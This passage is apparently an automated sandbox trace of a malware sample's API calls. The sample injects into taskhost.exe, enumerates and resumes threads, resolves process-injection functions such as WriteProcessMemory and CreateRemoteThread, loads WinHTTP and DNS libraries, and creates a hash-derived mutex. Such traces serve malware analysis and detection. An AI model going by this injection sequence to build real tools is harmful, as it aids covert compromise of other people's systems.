[0167.154] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.154] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.154] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.154] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.155] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.261] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.261] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.261] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.262] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.262] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.262] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.262] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.263] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.263] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.263] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.264] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.264] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.264] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.264] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.265] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.265] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.265] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.266] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.266] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.266] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.266] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.267] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.267] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.267] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.268] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.268] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.268] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.268] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.269] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.269] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.269] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.270] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.270] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.270] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.270] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.271] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.271] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.271] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.272] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.272] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.273] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.273] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.273] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.273] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.274] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.274] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.274] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.275] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.275] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.290] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x594) returned 0x8c [0167.290] ResumeThread (hThread=0x8c) returned 0x1 [0167.290] CloseHandle (hObject=0x8c) returned 1 [0167.291] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d0) returned 0x8c [0167.291] ResumeThread (hThread=0x8c) returned 0x1 [0167.291] CloseHandle (hObject=0x8c) returned 1 [0167.368] CloseHandle (hObject=0x88) returned 1 [0167.368] VirtualQuery (in: lpAddress=0x900a78, lpBuffer=0x237fc90, dwLength=0x1c | out: lpBuffer=0x237fc90*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.368] GetProcessHeap () returned 0x8e0000 [0167.368] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900a78 | out: hHeap=0x8e0000) returned 1 [0167.368] VirtualQuery (in: lpAddress=0x900968, lpBuffer=0x237fc90, dwLength=0x1c | out: lpBuffer=0x237fc90*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.368] GetProcessHeap () returned 0x8e0000 [0167.368] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900968 | out: hHeap=0x8e0000) returned 1 [0167.368] RtlExitUserThread (Status=0x0) Process: id = "22" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x677a000" os_pid = "0x4ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "18" os_parent_pid = "0x954" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 217 os_tid = 0xb0 Thread: id = 218 os_tid = 0xbd4 Thread: id = 219 os_tid = 0x9e8 Thread: id = 220 os_tid = 0x79c Thread: id = 221 os_tid = 0x77c Thread: id = 222 os_tid = 0x778 Thread: id = 223 os_tid = 0x770 Thread: id = 224 os_tid = 0x4e0 Thread: id = 225 os_tid = 0x4c4 Thread: id = 226 os_tid = 0x4b0 Thread: id = 227 os_tid = 0xa08 [0166.106] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0166.106] GetProcAddress (hModule=0x76e30000, lpProcName="Sleep") returned 0x76e52b70 [0166.106] GetProcAddress (hModule=0x76e30000, lpProcName="ReadProcessMemory") returned 0x76e7bdc0 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32Next") returned 0x76e7a980 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcatA") returned 0x76e7e110 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="ExitThread") returned 0x76f96930 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="MultiByteToWideChar") returned 0x76e45b50 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="RtlMoveMemory") returned 0x76e526d8 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="GetLastError") returned 0x76e52dd0 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="lstrcmpiA") returned 0x76e340a0 [0166.107] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualAlloc") returned 0x76e467a0 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="OpenThread") returned 0x76e4c560 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="Process32Next") returned 0x76e8fcc0 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleFileNameA") returned 0x76e464a0 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="GetModuleHandleA") returned 0x76e465e0 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="CreateMutexA") returned 0x76e47210 [0166.108] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e321e0 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentThreadId") returned 0x76e43ee0 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="CloseHandle") returned 0x76e52f80 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="GetCurrentProcessId") returned 0x76e45a50 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="WriteProcessMemory") returned 0x76e7bad0 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="SuspendThread") returned 0x76e32f60 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="ResumeThread") returned 0x76e413a0 [0166.109] GetProcAddress (hModule=0x76e30000, lpProcName="RtlZeroMemory") returned 0x76fa2eb0 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="Thread32First") returned 0x76e7aa70 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="CreateRemoteThread") returned 0x76e7c4f0 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="OpenProcess") returned 0x76e4cad0 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcessHeap") returned 0x76e53050 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualFree") returned 0x76e41260 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="Process32First") returned 0x76e8fdb0 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="HeapFree") returned 0x76e53070 [0166.110] GetProcAddress (hModule=0x76e30000, lpProcName="HeapAlloc") returned 0x76fa33a0 [0166.111] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualQuery") returned 0x76e4bd40 [0166.111] GetProcAddress (hModule=0x76e30000, lpProcName="lstrlenA") returned 0x76e4caf0 [0166.111] GetProcAddress (hModule=0x76e30000, lpProcName="IsWow64Process") returned 0x76e391d0 [0166.111] GetProcAddress (hModule=0x76e30000, lpProcName="HeapReAlloc") returned 0x76f83f20 [0166.111] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0166.111] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptDestroyHash") returned 0x7fefdbfdb00 [0166.111] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptReleaseContext") returned 0x7fefdbfdd10 [0166.111] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0166.111] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptGetHashParam") returned 0x7fefdbfdb20 [0166.112] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptCreateHash") returned 0x7fefdbfdad4 [0166.112] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptAcquireContextA") returned 0x7fefdbf8180 [0166.112] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0166.122] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0166.122] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0166.122] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0166.127] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0166.127] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsQuery_W") returned 0x7fefc5c01b0 [0166.127] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0166.127] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0166.127] GetProcAddress (hModule=0x76f50000, lpProcName="NtSetInformationProcess") returned 0x76fa14d0 [0166.127] GetProcAddress (hModule=0x76f50000, lpProcName="NtMapViewOfSection") returned 0x76fa1590 [0166.127] GetProcAddress (hModule=0x76f50000, lpProcName="LdrProcessRelocationBlock") returned 0x76ffb110 [0166.127] GetProcAddress (hModule=0x76f50000, lpProcName="NtUnmapViewOfSection") returned 0x76fa15b0 [0166.128] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0166.128] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0166.128] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfA") returned 0x76dabae8 [0166.128] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0166.131] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReadData") returned 0x7fef715e1e0 [0166.131] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpAddRequestHeaders") returned 0x7fef716bdcc [0166.131] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCrackUrl") returned 0x7fef715ba38 [0166.131] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetProxyForUrl") returned 0x7fef715e9c0 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpenRequest") returned 0x7fef71545f8 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpCloseHandle") returned 0x7fef71522e0 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSendRequest") returned 0x7fef71574d0 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7fef716a56c [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpSetOption") returned 0x7fef71539c4 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpReceiveResponse") returned 0x7fef715d068 [0166.132] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpConnect") returned 0x7fef7163e3c [0166.132] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0166.133] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0166.133] GetProcAddress (hModule=0x7fefe260000, lpProcName=0x5) returned 0x7fefe28e450 [0166.147] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xf) returned 0x7fefe261250 [0166.147] VirtualProtect (in: lpAddress=0x2090000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x290ff00 | out: lpflOldProtect=0x290ff00*=0x40) returned 1 [0166.147] VirtualProtect (in: lpAddress=0x2090000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x290ff00 | out: lpflOldProtect=0x290ff00*=0x4) returned 1 [0166.149] VirtualQuery (in: lpAddress=0x20a0023, lpBuffer=0x290fe90, dwLength=0x30 | out: lpBuffer=0x290fe90*(BaseAddress=0x20a0000, AllocationBase=0x20a0000, AllocationProtect=0x40, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000, __alignment2=0x0)) returned 0x30 [0166.149] GetProcessHeap () returned 0x150000 [0166.149] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x364) returned 0x1811a0 [0166.149] RtlMoveMemory (in: Destination=0x1811a0, Source=0x20a0023, Length=0x363 | out: Destination=0x1811a0) [0166.149] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x20a0023) returned 0x0 [0166.149] GetCurrentProcessId () returned 0x4ac [0166.149] GetProcessHeap () returned 0x150000 [0166.149] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x105) returned 0x19d3f0 [0166.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19d3f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0166.149] GetProcessHeap () returned 0x150000 [0166.149] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x8, Size=0x105) returned 0x181510 [0166.149] GetCurrentProcessId () returned 0x4ac [0166.149] wsprintfA (in: param_1=0x181510, param_2="%s%d%d%d" | out: param_1="C:\\Windows\\system32\\taskhost.exe37084212411963") returned 46 [0166.150] CryptAcquireContextA (in: phProv=0x290fe50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x290fe50*=0x195e90) returned 1 [0166.151] CryptCreateHash (in: hProv=0x195e90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x290fea8 | out: phHash=0x290fea8) returned 1 [0166.151] lstrlenA (lpString="C:\\Windows\\system32\\taskhost.exe37084212411963") returned 46 [0166.151] CryptHashData (hHash=0x1b4790, pbData=0x181510, dwDataLen=0x2e, dwFlags=0x0) returned 1 [0166.151] CryptGetHashParam (in: hHash=0x1b4790, dwParam=0x2, pbData=0x290fe58, pdwDataLen=0x290fea0, dwFlags=0x0 | out: pbData=0x290fe58, pdwDataLen=0x290fea0) returned 1 [0166.151] wsprintfA (in: param_1=0x181510, param_2="%02X" | out: param_1="2F") returned 2 [0166.151] wsprintfA (in: param_1=0x181512, param_2="%02X" | out: param_1="14") returned 2 [0166.151] wsprintfA (in: param_1=0x181514, param_2="%02X" | out: param_1="21") returned 2 [0166.151] wsprintfA (in: param_1=0x181516, param_2="%02X" | out: param_1="BC") returned 2 [0166.151] wsprintfA (in: param_1=0x181518, param_2="%02X" | out: param_1="88") returned 2 [0166.151] wsprintfA (in: param_1=0x18151a, param_2="%02X" | out: param_1="87") returned 2 [0166.151] wsprintfA (in: param_1=0x18151c, param_2="%02X" | out: param_1="EE") returned 2 [0166.151] wsprintfA (in: param_1=0x18151e, param_2="%02X" | out: param_1="49") returned 2 [0166.151] wsprintfA (in: param_1=0x181520, param_2="%02X" | out: param_1="4C") returned 2 [0166.152] wsprintfA (in: param_1=0x181522, param_2="%02X" | out: param_1="BB") returned 2 [0166.152] wsprintfA (in: param_1=0x181524, param_2="%02X" | out: param_1="18") returned 2 [0166.152] wsprintfA (in: param_1=0x181526, param_2="%02X" | out: param_1="14") returned 2 [0166.152] wsprintfA (in: param_1=0x181528, param_2="%02X" | out: param_1="71") returned 2 [0166.152] wsprintfA (in: param_1=0x18152a, param_2="%02X" | out: param_1="D3") returned 2 [0166.152] wsprintfA (in: param_1=0x18152c, param_2="%02X" | out: param_1="B8") returned 2 [0166.152] wsprintfA (in: param_1=0x18152e, param_2="%02X" | out: param_1="BD") returned 2 [0166.152] CryptDestroyHash (hHash=0x1b4790) returned 1 [0166.152] CryptReleaseContext (hProv=0x195e90, dwFlags=0x0) returned 1 [0166.152] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="2F1421BC8887EE494CBB181471D3B8BD") returned 0x7c [0166.152] GetLastError () returned 0x0 [0166.152] Sleep (dwMilliseconds=0x1f4) [0166.766] GetCurrentProcessId () returned 0x4ac [0166.766] GetCurrentThreadId () returned 0xa08 [0166.766] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x1a4 [0166.768] Thread32First (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.768] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.769] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.769] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.769] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.769] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.770] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.770] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.770] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.771] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.771] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.771] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.771] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.772] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.772] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.772] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.773] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.773] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.773] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.774] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.774] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.774] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.775] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.775] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.775] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.775] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.776] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.776] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.776] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.777] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.777] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.777] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.777] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.778] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.778] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.778] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.779] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.779] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.779] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.779] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.780] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.780] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.780] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.781] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.781] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.781] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.782] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.782] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.782] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.782] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.783] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.783] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.783] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.784] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.784] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.784] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.784] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.785] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.785] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.785] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.786] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.786] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.786] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.786] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.787] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.787] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.787] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.788] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.788] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.788] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.789] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.789] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.789] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.790] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.790] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.790] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.790] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.791] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.791] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.791] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.792] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.792] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.792] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.793] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.793] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.793] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.793] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.794] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.794] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.794] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.795] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.795] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.795] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.796] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.796] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.796] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.796] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.797] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.798] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.799] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.799] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.799] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.800] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.800] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.800] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.800] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.801] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.870] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.870] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.871] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.871] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.871] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.872] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.872] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.872] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.872] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.873] Thread32Next 